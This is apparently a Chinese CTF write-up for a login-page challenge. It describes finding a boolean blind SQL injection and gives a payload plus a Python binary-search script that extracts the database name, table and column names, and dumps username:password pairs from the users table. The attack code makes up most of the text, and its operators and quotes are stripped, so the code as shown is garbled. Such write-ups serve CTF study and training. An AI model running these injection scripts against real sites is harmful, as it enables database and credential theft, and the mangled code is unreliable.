
WAF绕过 wp进入页面一个登入框经过测试没有弱口令爆破抓包测试发现存在布尔盲注逻辑为真时逻辑为假时构造payloaduserNameadminpassWord1or(ascii(substr((select(database())),1,1))100)#脚本如下二分法#-*-coding:utf-8-*- import requests import time host http://e3599346-f189-47c3-9e85-1d7ff4fee612.challenge.ctf.show/login.php def getDatabase(): #获取数据库名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: usernameadmin password1or(ascii(substr((select(database())),%d,1))%d)# % (i,mid) param {userName:username,passWord:password} res requests.post(host,dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(database is - ans) def getTable(): #获取表名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)database()),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(table is - ans) def getColumn(): #获取列名 global host ans for i in range(1,1000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)\users\),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(column is - ans) def dumpTable():#脱裤 global host ans for i in range(1,10000): low 32 high 128 mid (lowhigh)//2 while low high: username admin password 1or(ascii(substr((select(group_concat(username,0x3a,password))from(users)),%d,1))%d)# % (i, mid) param {userName: username, passWord: password} res requests.post(host, dataparam) if admin in res.text: high mid else: low mid1 mid(lowhigh)//2 if mid 32 or mid 127: break ans chr(mid-1) print(dumpTable is - ans) dumpTable()运行结果flagCTF{bool_sql_injection_bypass_is_fun}